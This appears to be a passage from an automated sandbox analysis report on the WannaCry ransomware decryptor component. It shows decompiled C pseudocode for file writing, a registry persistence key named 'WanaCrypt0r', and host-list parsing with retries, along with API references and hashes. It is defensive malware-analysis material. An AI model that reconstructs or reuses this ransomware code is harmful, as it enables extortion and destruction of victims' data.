                                                      											_t185 = _t180 + 1;
                                                      										} else {
                                                      											__eflags = _t94 - 0x5c;
                                                      											if(_t94 == 0x5c) {
                                                      												goto L43;
                                                      											}
                                                      										}
                                                      										_t94 =  *((intOrPtr*)(_t180 + 1));
                                                      										_t180 = _t180 + 1;
                                                      										__eflags = _t94;
                                                      									}
                                                      									asm("repne scasb");
                                                      									_t140 =  !(_t138 | 0xffffffff);
                                                      									_v828 =  &_v820;
                                                      									_t182 = _t157 - _t140;
                                                      									_t141 = _t140 >> 2;
                                                      									_t97 = memcpy(_v828, _t182, _t141 << 2);
                                                      									__eflags = _t185 - _t157;
                                                      									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
                                                      									_t191 = _t187 + 0x18;
                                                      									if(__eflags != 0) {
                                                      										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
                                                      										_t99 = _v820;
                                                      										__eflags = _t99 - 0x2f;
                                                      										if(_t99 == 0x2f) {
                                                      											L55:
                                                      											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
                                                      											E00412250(0, _t191 + 0x2c);
                                                      											_t187 = _t191 + 0x18;
                                                      											goto L48;
                                                      										} else {
                                                      											__eflags = _t99 - 0x5c;
                                                      											if(_t99 == 0x5c) {
                                                      												goto L55;
                                                      											} else {
                                                      												__eflags = _t99;
                                                      												if(_t99 == 0) {
                                                      													goto L47;
                                                      												} else {
                                                      													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
                                                      													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
                                                      														goto L47;
                                                      													} else {
                                                      														goto L55;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      										goto L73;
                                                      									} else {
                                                      										_v820 = 0;
                                                      										L47:
                                                      										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
                                                      										E00412250(_t132 + 0x140, _t191 + 0x30);
                                                      										_t187 = _t191 + 0x1c;
                                                      									}
                                                      									L48:
                                                      									_t104 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0); // executed
                                                      									_t174 = _t104;
                                                      								} else {
                                                      									_t174 = _a8;
                                                      								}
                                                      								__eflags = _t174 - 0xffffffff;
                                                      								if(_t174 != 0xffffffff) {
                                                      									_push( *((intOrPtr*)(_t132 + 0x138)));
                                                      									_push( *_t132); // executed
                                                      									E00411660(); // executed
                                                      									_t106 =  *(_t132 + 0x13c);
                                                      									_t192 = _t187 + 8;
                                                      									__eflags = _t106;
                                                      									if(_t106 == 0) {
                                                      										_push(0x4000); // executed
                                                      										L00412CEC(); // executed
                                                      										_t192 = _t192 + 4;
                                                      										 *(_t132 + 0x13c) = _t106;
                                                      									}
                                                      									_v820 = 0;
                                                      									while(1) {
                                                      										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
                                                      										_t192 = _t192 + 0x10;
                                                      										__eflags = _t183 - 0xffffff96;
                                                      										if(_t183 == 0xffffff96) {
                                                      											break;
                                                      										}
                                                      										__eflags = _t183;
                                                      										if(__eflags < 0) {
                                                      											L68:
                                                      											_v820 = 0x5000000;
                                                      										} else {
                                                      											if(__eflags <= 0) {
                                                      												L63:
                                                      												__eflags =  *(_t192 + 0x13);
                                                      												if( *(_t192 + 0x13) != 0) {
                                                      													SetFileTime(_t174,  &_v276,  &_v284,  &_v268); // executed
                                                      												} else {
                                                      													__eflags = _t183;
                                                      													if(_t183 == 0) {
                                                      														goto L68;
                                                      													} else {
                                                      														continue;
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0); // executed
                                                      												__eflags = _t116;
                                                      												if(_t116 == 0) {
                                                      													_v820 = 0x400;
                                                      												} else {
                                                      													goto L63;
                                                      												}
                                                      											}
                                                      										}
                                                      										L70:
                                                      										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
                                                      										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
                                                      											FindCloseChangeNotification(_t174); // executed
                                                      										}
                                                      										E00411AC0( *_t132);
                                                      										return _v820;
                                                      										goto L73;
                                                      									}
                                                      									_v820 = 0x1000;
                                                      									goto L70;
                                                      								} else {
                                                      									return 0x200;
                                                      								}
                                                      							} else {
                                                      								__eflags = _t166 - 1;
                                                      								if(_t166 != 1) {
                                                      									_t154 = _a8;
                                                      									_t121 =  *_t154;
                                                      									__eflags = _t121 - 0x2f;
                                                      									if(_t121 == 0x2f) {
                                                      										L36:
                                                      										E00412250(0, _t154);
                                                      										__eflags = 0;
                                                      										return 0;
                                                      									} else {
                                                      										__eflags = _t121 - 0x5c;
                                                      										if(_t121 == 0x5c) {
                                                      											goto L36;
                                                      										} else {
                                                      											__eflags = _t121;
                                                      											if(_t121 == 0) {
                                                      												L37:
                                                      												E00412250(_t132 + 0x140, _t154);
                                                      												__eflags = 0;
                                                      												return 0;
                                                      											} else {
                                                      												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
                                                      												if( *((char*)(_t154 + 1)) != 0x3a) {
                                                      													goto L37;
                                                      												} else {
                                                      													goto L36;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									__eflags = 0;
                                                      									return 0;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							return 0x10000;
                                                      						}
                                                      					} else {
                                                      						return 0x10000;
                                                      					}
                                                      				}
                                                      				L73:
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s%s$%s%s%s$:
                                                      • API String ID: 0-3034790606
                                                      • Opcode ID: 8e6b1c0f2cb56c42e6e36ab9d60359e8445b3ce9f897c3f3fd7fecc5fb48561e
                                                      • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                                      • Opcode Fuzzy Hash: 8e6b1c0f2cb56c42e6e36ab9d60359e8445b3ce9f897c3f3fd7fecc5fb48561e
                                                      • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 426 401c70-401cd8 wcscat 427 401cdc-401cde 426->427 428 401ce0-401cef 427->428 429 401cf1-401cfb 427->429 430 401d00-401d0c RegCreateKeyW 428->430 429->430 431 401d12-401d1b 430->431 432 401dad-401db5 430->432 433 401d62-401d8e RegQueryValueExA 431->433 434 401d1d-401d60 GetCurrentDirectoryA RegSetValueExA 431->434 432->427 435 401dbb-401dc7 432->435 436 401d9e-401dab RegCloseKey 433->436 437 401d90-401d98 SetCurrentDirectoryA 433->437 434->436 436->432 438 401dc8-401dd7 436->438 437->436
                                                      C-Code - Quality: 84%
                                                      			E00401C70(signed int _a4) {
                                                      				void _v519;
                                                      				char _v520;
                                                      				void _v700;
                                                      				short _v720;
                                                      				int _v724;
                                                      				void* _v728;
                                                      				int _t30;
                                                      				void* _t36;
                                                      				signed int _t38;
                                                      				signed int _t46;
                                                      				signed int _t56;
                                                      				int _t72;
                                                      				void* _t77;
                                                      
                                                      				_t30 = memset( &_v700, memcpy( &_v720, L"Software\\", 5 << 2), 0x2d << 2);
                                                      				_v520 = _t30;
                                                      				memset( &_v519, _t30, 0x81 << 2);
                                                      				asm("stosw");
                                                      				asm("stosb");
                                                      				_v728 = 0;
                                                      				wcscat( &_v720, L"WanaCrypt0r");
                                                      				_t72 = 0;
                                                      				_v724 = 0;
                                                      				do {
                                                      					if(_t72 != 0) {
                                                      						RegCreateKeyW(0x80000001,  &_v720,  &_v728);
                                                      					} else {
                                                      						RegCreateKeyW(0x80000002,  &_v720,  &_v728);
                                                      					}
                                                      					_t36 = _v728;
                                                      					if(_t36 == 0) {
                                                      						goto L10;
                                                      					} else {
                                                      						_t56 = _a4;
                                                      						if(_t56 == 0) {
                                                      							_v724 = 0x207;
                                                      							_t38 = RegQueryValueExA(_t36, "wd", 0, 0,  &_v520,  &_v724); // executed
                                                      							asm("sbb esi, esi");
                                                      							_t77 =  ~_t38 + 1;
                                                      							if(_t77 != 0) {
                                                      								SetCurrentDirectoryA( &_v520);
                                                      							}
                                                      						} else {
                                                      							GetCurrentDirectoryA(0x207,  &_v520);
                                                      							asm("repne scasb");
                                                      							_t46 = RegSetValueExA(_v728, "wd", 0, 1,  &_v520,  !(_t56 | 0xffffffff));
                                                      							_t72 = _v724;
                                                      							asm("sbb esi, esi");
                                                      							_t77 =  ~_t46 + 1;
                                                      						}
                                                      						RegCloseKey(_v728); // executed
                                                      						if(_t77 != 0) {
                                                      							return 1;
                                                      						} else {
                                                      							goto L10;
                                                      						}
                                                      					}
                                                      					L13:
                                                      					L10:
                                                      					_t72 = _t72 + 1;
                                                      					_v724 = _t72;
                                                      				} while (_t72 < 2);
                                                      				return 0;
                                                      				goto L13;
                                                      			}

                                                      APIs
                                                      • wcscat.MSVCRT ref: 00401CC1
                                                      • RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
                                                      • GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
                                                      • RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
                                                      • RegQueryValueExA.KERNELBASE ref: 00401D81
                                                      • SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
                                                      • RegCloseKey.KERNELBASE(00000000), ref: 00401DA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CurrentDirectoryValue$CloseCreateQuerywcscat
                                                      • String ID: Software\$WanaCrypt0r
                                                      • API String ID: 3883271862-1723423467
                                                      • Opcode ID: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction ID: c02b3dbe7123360802e3a7ceba079e11f57c538643229ddb10ed726050e42e59
                                                      • Opcode Fuzzy Hash: 105d7a24118395946ed673951bb32e2166cb0bb2b49e0db688a6da733a97e5a2
                                                      • Instruction Fuzzy Hash: 5F31C271208341ABD320CF54DC44BEBB7A8FFC4750F404D2EF996A7290D7B4A90987A6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 439 40baf0-40bb16 call 40ba10 442 40bdf5 439->442 443 40bb1c-40bb36 439->443 444 40bdf8-40be10 442->444 446 40bb38-40bb47 call 40ba60 443->446 447 40bb4d-40bbb5 call 40c8f0 strtok 443->447 446->444 446->447 452 40bc30-40bc3f 447->452 453 40bbb7 447->453 454 40bc41-40bc48 452->454 455 40bc7e-40bc90 call 40ba60 452->455 456 40bbbb-40bbc0 453->456 457 40bc4d-40bc55 454->457 465 40bc92-40bce7 call 40c860 #825 455->465 466 40bcec-40bd01 GetTickCount srand 455->466 458 40bbc2-40bc16 call 40c7b0 call 40c920 call 40c800 call 40c7b0 456->458 459 40bc1b-40bc2e strtok 456->459 461 40bc75-40bc77 457->461 462 40bc57-40bc59 457->462 458->459 459->452 459->456 469 40bc7a-40bc7c 461->469 467 40bc71-40bc73 462->467 468 40bc5b-40bc65 462->468 465->444 472 40bdc7-40bdf2 call 40c860 #825 466->472 473 40bd07-40bd1c rand 466->473 467->469 468->461 474 40bc67-40bc6f 468->474 469->455 469->466 472->442 478 40bd26-40bd28 473->478 479 40bd1e 473->479 474->457 474->467 484 40bd32-40bd3a 478->484 485 40bd2a 478->485 483 40bd20-40bd24 479->483 483->478 483->483 488 40bd41-40bd73 call 40ba60 484->488 489 40bd3c 484->489 487 40bd2c-40bd30 485->487 487->484 487->487 493 40be11-40be4c 488->493 494 40bd79-40bdc1 call 40ce50 #825 Sleep 488->494 489->488 495 40be75-40be84 #825 493->495 496 40be4e-40be73 call 402d90 call 40c740 493->496 494->472 494->473 495->444 496->495
                                                      C-Code - Quality: 86%
                                                      			E0040BAF0() {
                                                      				signed int _t71;
                                                      				signed int _t72;
                                                      				void* _t84;
                                                      				signed int _t86;
                                                      				signed int _t91;
                                                      				signed int _t92;
                                                      				signed int _t97;
                                                      				intOrPtr _t101;
                                                      				signed int _t110;
                                                      				void* _t113;
                                                      				void* _t116;
                                                      				signed int _t126;
                                                      				char _t129;
                                                      				signed int _t131;
                                                      				unsigned int _t138;
                                                      				signed int _t139;
                                                      				char* _t144;
                                                      				signed int _t147;
                                                      				unsigned int _t152;
                                                      				signed int _t153;
                                                      				signed int _t158;
                                                      				signed int _t160;
                                                      				signed int _t161;
                                                      				signed int _t169;
                                                      				signed int _t172;
                                                      				signed int _t173;
                                                      				signed int _t181;
                                                      				signed int _t191;
                                                      				signed int _t198;
                                                      				signed int _t199;
                                                      				signed int _t200;
                                                      				void* _t237;
                                                      				char* _t238;
                                                      				void* _t240;
                                                      				void* _t241;
                                                      				intOrPtr* _t242;
                                                      				void* _t245;
                                                      				intOrPtr* _t246;
                                                      				signed int _t249;
                                                      				intOrPtr* _t250;
                                                      				intOrPtr _t251;
                                                      				void* _t252;
                                                      				void* _t255;
                                                      				void* _t256;
                                                      				void* _t257;
                                                      				void* _t259;
                                                      				void* _t260;
                                                      				void* _t262;
                                                      				void* _t263;
                                                      				void* _t264;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00414286);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t251;
                                                      				_t252 = _t251 - 0x47c;
                                                      				_t71 = E0040BA10();
                                                      				if(_t71 != 0) {
                                                      					L31:
                                                      					_t72 = _t71 | 0xffffffff;
                                                      					__eflags = _t72;
                                                      				} else {
                                                      					_t131 =  *0x422210; // 0xab4238
                                                      					 *((intOrPtr*)( *_t131 + 0xc))();
                                                      					asm("repne scasb");
                                                      					_t266 =  !(_t131 | 0xffffffff) == 1;
                                                      					if( !(_t131 | 0xffffffff) == 1) {
                                                      						L3:
                                                      						_t249 = 0;
                                                      						 *((char*)(_t252 + 0x14)) =  *((intOrPtr*)(_t252 + 0x13));
                                                      						 *((intOrPtr*)(_t252 + 0x18)) = E0040C8F0(0, 0, 0);
                                                      						 *(_t252 + 0x1c) = 0;
                                                      						asm("repne scasb");
                                                      						_t138 =  !(_t252 + 0x0000001c | 0xffffffff);
                                                      						_t237 =  *((intOrPtr*)(_t252 + 0x49c)) - _t138;
                                                      						 *((intOrPtr*)(_t252 + 0x498)) = 0;
                                                      						_t139 = _t138 >> 2;
                                                      						memcpy(_t237 + _t139 + _t139, _t237, memcpy(_t252 + 0xa4, _t237, _t139 << 2) & 0x00000003);
                                                      						_t255 = _t252 + 0x18;
                                                      						_t144 = _t255 + 0xa8;
                                                      						_t238 = strtok(_t144, ",;");
                                                      						_t256 = _t255 + 8;
                                                      						if(_t238 != 0) {
                                                      							_t129 =  *((intOrPtr*)(_t256 + 0x13));
                                                      							do {
                                                      								_t200 = _t249;
                                                      								_t249 = _t249 + 1;
                                                      								if(_t200 > 0) {
                                                      									_t181 = _t256 + 0x28;
                                                      									 *(_t256 + 0x28) = _t129;
                                                      									E0040C7B0(_t181, 0);
                                                      									asm("repne scasb");
                                                      									_push( !(_t181 | 0xffffffff) - 1);
                                                      									_push(_t238);
                                                      									E0040C920(_t256 + 0x2c);
                                                      									 *((char*)(_t256 + 0x4a0)) = 1;
                                                      									E0040C800(_t256 + 0x24, _t256 + 0x20, _t256 + 0x24,  *((intOrPtr*)(_t256 + 0x18)), _t256 + 0x24);
                                                      									_t144 = _t256 + 0x28;
                                                      									 *((char*)(_t256 + 0x498)) = 0;
                                                      									E0040C7B0(_t144, 1);
                                                      								}
                                                      								_t238 = strtok(0, ",;");
                                                      								_t256 = _t256 + 8;
                                                      							} while (_t238 != 0);
                                                      						}
                                                      						asm("repne scasb");
                                                      						_t147 =  !(_t144 | 0xffffffff) - 1;
                                                      						if(_t147 == 0) {
                                                      							L17:
                                                      							_push(_t256 + 0xa4);
                                                      							_t84 = E0040BA60(_t277);
                                                      							_t256 = _t256 + 4;
                                                      							if(_t84 != 0) {
                                                      								goto L19;
                                                      							} else {
                                                      								asm("repne scasb");
                                                      								_t172 =  !(_t147 | 0xffffffff);
                                                      								_t245 = _t256 + 0xa4 - _t172;
                                                      								_t173 = _t172 >> 2;
                                                      								memcpy(0x422214, _t245, _t173 << 2);
                                                      								_t263 = _t256 + 0xc;
                                                      								 *((intOrPtr*)(_t263 + 0x498)) = 0xffffffff;
                                                      								_t113 = memcpy(_t245 + _t173 + _t173, _t245, _t172 & 0x00000003);
                                                      								_t264 = _t263 + 0xc;
                                                      								E0040C860(_t264 + 0x20, _t264 + 0x24,  *_t113,  *((intOrPtr*)(_t256 + 0x18)));
                                                      								_push( *((intOrPtr*)(_t264 + 0x18)));
                                                      								L00412C98();
                                                      								_t252 = _t264 + 4;
                                                      								_t72 = 0;
                                                      							}
                                                      						} else {
                                                      							_t246 = _t256 + 0xa4;
                                                      							_t116 = 0x422214;
                                                      							while(1) {
                                                      								_t198 =  *_t116;
                                                      								_t147 = _t198;
                                                      								if(_t198 !=  *_t246) {
                                                      									break;
                                                      								}
                                                      								if(_t147 == 0) {
                                                      									L14:
                                                      									_t116 = 0;
                                                      								} else {
                                                      									_t24 = _t116 + 1; // 0x0
                                                      									_t199 =  *_t24;
                                                      									_t147 = _t199;
                                                      									if(_t199 !=  *((intOrPtr*)(_t246 + 1))) {
                                                      										break;
                                                      									} else {
                                                      										_t116 = _t116 + 2;
                                                      										_t246 = _t246 + 2;
                                                      										if(_t147 != 0) {
                                                      											continue;
                                                      										} else {
                                                      											goto L14;
                                                      										}
                                                      									}
                                                      								}
                                                      								L16:
                                                      								_t277 = _t116;
                                                      								if(_t116 == 0) {
                                                      									L19:
                                                      									srand(GetTickCount());
                                                      									_t86 =  *(_t256 + 0x20);
                                                      									_t257 = _t256 + 4;
                                                      									__eflags = _t86;
                                                      									if(_t86 <= 0) {
                                                      										L30:
                                                      										 *((intOrPtr*)(_t257 + 0x494)) = 0xffffffff;
                                                      										_t71 = E0040C860(_t257 + 0x20, _t257 + 0x3c,  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18)))),  *((intOrPtr*)(_t257 + 0x18)));
                                                      										_push( *((intOrPtr*)(_t257 + 0x18)));
                                                      										L00412C98();
                                                      										_t252 = _t257 + 4;
                                                      										goto L31;
                                                      									} else {
                                                      										do {
                                                      											_t191 = rand() % _t86;
                                                      											_t250 =  *((intOrPtr*)( *((intOrPtr*)(_t257 + 0x18))));
                                                      											__eflags = _t191;
                                                      											_t91 = _t191;
                                                      											if(_t191 > 0) {
                                                      												_t91 = 0;
                                                      												__eflags = 0;
                                                      												do {
                                                      													_t250 =  *_t250;
                                                      													_t191 = _t191 - 1;
                                                      													__eflags = _t191;
                                                      												} while (_t191 != 0);
                                                      											}
                                                      											__eflags = _t91;
                                                      											if(_t91 < 0) {
                                                      												_t110 =  ~_t91;
                                                      												do {
                                                      													_t250 =  *((intOrPtr*)(_t250 + 4));
                                                      													_t110 = _t110 - 1;
                                                      													__eflags = _t110;
                                                      												} while (_t110 != 0);
                                                      											}
                                                      											_t92 =  *(_t250 + 0xc);
                                                      											_t42 = _t250 + 8; // 0x8
                                                      											_t126 = _t42;
                                                      											__eflags = _t92;
                                                      											if(__eflags == 0) {
                                                      												_t92 = 0x41ba38;
                                                      											}
                                                      											asm("repne scasb");
                                                      											_t152 =  !(_t147 | 0xffffffff);
                                                      											_t240 = _t92 - _t152;
                                                      											_t153 = _t152 >> 2;
                                                      											memcpy(_t240 + _t153 + _t153, _t240, memcpy(_t257 + 0x40, _t240, _t153 << 2) & 0x00000003);
                                                      											_t259 = _t257 + 0x18;
                                                      											_t158 = _t259 + 0x40;
                                                      											_push(_t158);
                                                      											_t97 = E0040BA60(__eflags);
                                                      											_t260 = _t259 + 4;
                                                      											__eflags = _t97;
                                                      											if(_t97 == 0) {
                                                      												 *((intOrPtr*)(_t260 + 0x494)) = 0xffffffff;
                                                      												asm("repne scasb");
                                                      												_t160 =  !(_t158 | 0xffffffff);
                                                      												_t241 = _t260 + 0x40 - _t160;
                                                      												_t161 = _t160 >> 2;
                                                      												memcpy(0x422214, _t241, _t161 << 2);
                                                      												memcpy(_t241 + _t161 + _t161, _t241, _t160 & 0x00000003);
                                                      												_t262 = _t260 + 0x18;
                                                      												_t242 =  *((intOrPtr*)(_t262 + 0x18));
                                                      												_t101 =  *_t242;
                                                      												__eflags = _t101 - _t242;
                                                      												 *((intOrPtr*)(_t262 + 0x20)) = _t101;
                                                      												if(_t101 != _t242) {
                                                      													do {
                                                      														_push(0);
                                                      														E0040C740(_t262 + 0x1c, _t262 + 0x3c,  *((intOrPtr*)(E00402D90(_t262 + 0x28, _t262 + 0x38))));
                                                      														__eflags =  *((intOrPtr*)(_t262 + 0x20)) - _t242;
                                                      													} while ( *((intOrPtr*)(_t262 + 0x20)) != _t242);
                                                      												}
                                                      												_push( *((intOrPtr*)(_t262 + 0x18)));
                                                      												L00412C98();
                                                      												_t252 = _t262 + 4;
                                                      												_t72 = 0;
                                                      											} else {
                                                      												goto L29;
                                                      											}
                                                      											goto L32;
                                                      											L29:
                                                      											_t169 =  *0x422210; // 0xab4238
                                                      											 *((intOrPtr*)( *_t169 + 0xc))();
                                                      											 *((intOrPtr*)( *((intOrPtr*)(_t250 + 4)))) =  *_t250;
                                                      											_t147 = _t126;
                                                      											 *((intOrPtr*)( *_t250 + 4)) =  *((intOrPtr*)(_t250 + 4));
                                                      											E0040CE50(_t147, 0);
                                                      											_push(_t250);
                                                      											L00412C98();
                                                      											_t257 = _t260 + 4;
                                                      											 *((intOrPtr*)(_t257 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) - 1;
                                                      											Sleep(0xbb8); // executed
                                                      											_t86 =  *(_t257 + 0x1c);
                                                      											__eflags = _t86;
                                                      										} while (_t86 > 0);
                                                      										goto L30;
                                                      									}
                                                      								} else {
                                                      									goto L17;
                                                      								}
                                                      								goto L32;
                                                      							}
                                                      							asm("sbb eax, eax");
                                                      							asm("sbb eax, 0xffffffff");
                                                      							goto L16;
                                                      						}
                                                      					} else {
                                                      						_push(0x422214);
                                                      						_t72 = E0040BA60(_t266);
                                                      						_t252 = _t252 + 4;
                                                      						if(_t72 != 0) {
                                                      							goto L3;
                                                      						}
                                                      					}
                                                      				}
                                                      				L32:
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t252 + 0x48c));
                                                      				return _t72;
                                                      			}

                                                      APIs
                                                      • strtok.MSVCRT ref: 0040BBA9
                                                      • strtok.MSVCRT ref: 0040BC22
                                                      • #825.MFC42(?,?), ref: 0040BCDD
                                                      • GetTickCount.KERNEL32 ref: 0040BCEC
                                                      • srand.MSVCRT ref: 0040BCF3
                                                      • rand.MSVCRT ref: 0040BD09
                                                      • #825.MFC42(00000000,00000000,?,?,?,00000000,00000000), ref: 0040BD9F
                                                      • Sleep.KERNELBASE(00000BB8,00000000,?,?,?,00000000,00000000), ref: 0040BDB5
                                                      • #825.MFC42(?,?,?,?), ref: 0040BDED
                                                        • Part of subcall function 0040C860: #825.MFC42(?,00000000,00000428,00422214,00000000,0040BDE8,?,?,?), ref: 0040C8B5
                                                      • #825.MFC42(?), ref: 0040BE7A
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$strtok$CountSleepTickrandsrand
                                                      • String ID:
                                                      • API String ID: 1749417438-0
                                                      • Opcode ID: 6219d4958e8a19e0ebe0a886ed27d3e3574d5edb02869f1b1397cf79b1e415cd
                                                      • Instruction ID: 15ce6157e9eadcb8372a8ba3d428bceb52ebc69e02ab62c17c692bc1e2f98a80
                                                      • Opcode Fuzzy Hash: 6219d4958e8a19e0ebe0a886ed27d3e3574d5edb02869f1b1397cf79b1e415cd
                                                      • Instruction Fuzzy Hash: 48A102716082059BC724DF34C841AABB7D4EF95314F044A3EF99AA73D1EB78D908C79A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 504 4085c0-408652 #567 #341 GetSysColor * 4 KiUserCallbackDispatcher 505 408660-4086a6 #6140 504->505 506 408654-408658 504->506 506->505 507 40865a-40865e GetSysColor 506->507 507->505
                                                      C-Code - Quality: 83%
                                                      			E004085C0(intOrPtr __ecx) {
                                                      				char _v4;
                                                      				intOrPtr _v16;
                                                      				long _v20;
                                                      				void _v24;
                                                      				intOrPtr _v28;
                                                      				int _t33;
                                                      				intOrPtr _t50;
                                                      				long _t53;
                                                      				intOrPtr _t55;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E00413FF3);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t55;
                                                      				_t50 = __ecx;
                                                      				_v16 = __ecx;
                                                      				L00412C8C();
                                                      				 *((intOrPtr*)(__ecx)) = 0x4157f0;
                                                      				_v4 = 0;
                                                      				L00412F74();
                                                      				 *((intOrPtr*)(__ecx + 0x74)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x78)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x7c)) = 0;
                                                      				 *((intOrPtr*)(__ecx + 0x80)) = 0;
                                                      				_v4 = 1;
                                                      				 *((intOrPtr*)(__ecx)) = 0x4161a4;
                                                      				 *((intOrPtr*)(_t50 + 0x58)) = GetSysColor(0xf);
                                                      				 *((intOrPtr*)(_t50 + 0x60)) = GetSysColor(9);
                                                      				 *((intOrPtr*)(_t50 + 0x64)) = GetSysColor(0x12);
                                                      				_t53 = GetSysColor(2);
                                                      				_v20 = _t53;
                                                      				_v24 = 0;
                                                      				_t33 = SystemParametersInfoA(0x1008, 0,  &_v24, 0); // executed
                                                      				if(_t33 != 0 && _v24 != 0) {
                                                      					_t53 = GetSysColor(0x1b);
                                                      				}
                                                      				_push(0xffffffff);
                                                      				_push(2);
                                                      				L00412F50();
                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)))) = _v28;
                                                      				 *((intOrPtr*)( *((intOrPtr*)(_t50 + 0x44)) + 4)) = _t53;
                                                      				 *((intOrPtr*)(_t50 + 0x70)) = 0xa;
                                                      				 *((intOrPtr*)(_t50 + 0x68)) = 0;
                                                      				 *((intOrPtr*)(_t50 + 0x6c)) = 0x28;
                                                      				 *((intOrPtr*)(_t50 + 0x54)) = 0;
                                                      				 *((intOrPtr*)(_t50 + 0x5c)) = 0;
                                                      				 *[fs:0x0] = _v20;
                                                      				return _t50;
                                                      			}

                                                      APIs
                                                      • #567.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085E2
                                                      • #341.MFC42(00000000,?,?,?,000000FF,00405AAB,00000000), ref: 004085F6
                                                      • GetSysColor.USER32 ref: 0040861D
                                                      • GetSysColor.USER32(00000009), ref: 00408624
                                                      • GetSysColor.USER32(00000012), ref: 0040862B
                                                      • GetSysColor.USER32(00000002), ref: 00408632
                                                      • KiUserCallbackDispatcher.NTDLL(00001008,00000000,00000000,00000000), ref: 0040864A
                                                      • GetSysColor.USER32(0000001B), ref: 0040865C
                                                      • #6140.MFC42(00000002,000000FF), ref: 00408667
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmp
